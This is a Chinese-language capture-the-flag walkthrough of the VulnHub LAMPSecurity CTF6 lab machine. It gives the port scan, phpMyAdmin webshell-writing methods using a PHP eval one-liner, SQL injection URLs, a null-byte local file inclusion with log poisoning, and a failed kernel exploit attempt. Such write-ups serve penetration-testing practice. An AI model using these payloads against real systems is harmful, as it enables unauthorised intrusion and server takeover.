鏡像下載地址:
https://www.vulnhub.com/entry/lampsecurity-ctf6,85/
主機掃描:
╰─ nmap -p- -sV -oA scan 10.10.202.130
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-21 08:57 CST
Nmap scan report for 10.10.202.130
Host is up (0.0029s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((CentOS))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Dovecot imapd
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
624/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
3306/tcp open mysql MySQL 5.0.45
MAC Address: 00:0C:29:62:3B:5A (VMware)
目錄掃描
phpinfo 獲取物理路徑:/var/www/html
網站備份尋找敏感資訊
phpmyadmin 登錄試試
phpadmin 寫shell
這里簡單下復習下PHPadmin 拿shell的幾種思路:
1)志檔案寫入一句話來獲取webshell
general.log變數是指是否啟動記錄日志;而general log file指的是日志檔案的路徑,可以看到general.log變數的狀態為OFF,故我們要修改為ON;general log file變數中的*.log的后綴我們改為*php,拿完webshell記得要改回去喲,SQL陳述句進行修改
show global variables like "%log%"
set global general_log = "ON";
SET global general_log_file='/var/www/html/shell.php'
select "<?php eval($_POST['cmd']);?>"
2)利用插入一句話來提取webshell
show global variables like '%secure%';顯示是NULL值,這樣的情況下我們插入一句話是無法插入的,需要我們修改secure_file_priv=''為空值才能插入一句話:
解釋一下:
secure_file_priv為null 表示不允許匯入匯出;
secure_file_priv指定檔案夾時,表示mysql的匯入匯出只能發生在指定的檔案夾;
secure_file_priv沒有設定時,則表示沒有任何限制
select "<?php eval($_POST['cmd']);?>" into outfile '/var/www/html/hack.php'
這里日志檔案沒有開啟,第一種方式無失效,第二種方式,標識沒有限制,可以嘗試寫webshell
報錯,目錄沒權限,嘗試/tmp 目錄寫入沒有問題的,放棄,嘗試其他辦法
主頁面發現SQL注入漏洞:
http://10.10.202.130/index.php?id=4 and true #true
http://10.10.202.130/index.php?id=4 and false # false
http://10.10.202.130/index.php?id=4 order by 7 #true
http://10.10.202.130/index.php?id=4 order by 8 #false
10.10.202.130/index.php?id=4 union select 1,2,3,4,5,6,7 from user
http://10.10.202.130/?id=4 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6,7
SQLmap 獲取admin的密碼
admin | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass)
http://10.10.202.130/index.php?action=login
登錄沒發現長傳點之類的介面
繼續看看源代碼
login.php 發現檔案包含漏洞
這里后綴為.tpl,這里嘗試使用截斷%00或者%0A
http://10.10.202.130/actions/login.php?action=../../conf/config.ini%00
嘗試把一句話木馬,這里有兩個思路:
1. 通過phpamdin 寫到tmp目錄,進行檔案包含../../../../../../tmp/hack.php%00
2. 寫到日志檔案,進行包含進來../../logs/log.log%00 看看能否決議
<?php eval($_POST['cmd']);?>
http://10.10.202.130/actions/login.php?action=../../logs/log.log%00
提權操作
嘗試內核提權,幾個都不行
最后通過Google得知內核Kernel version is 2.6.18-92.el5 需要UDEV提權
cp /usr/share/exploitdb/exploits/linux/local/8478.sh ./
sed -i -e 's/\r$//' 8478.sh
無法成功,嘗試了多次,依舊,有可能跟環境有關系吧!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/6903.html
標籤:訊息安全
上一篇:sqlmap實戰-1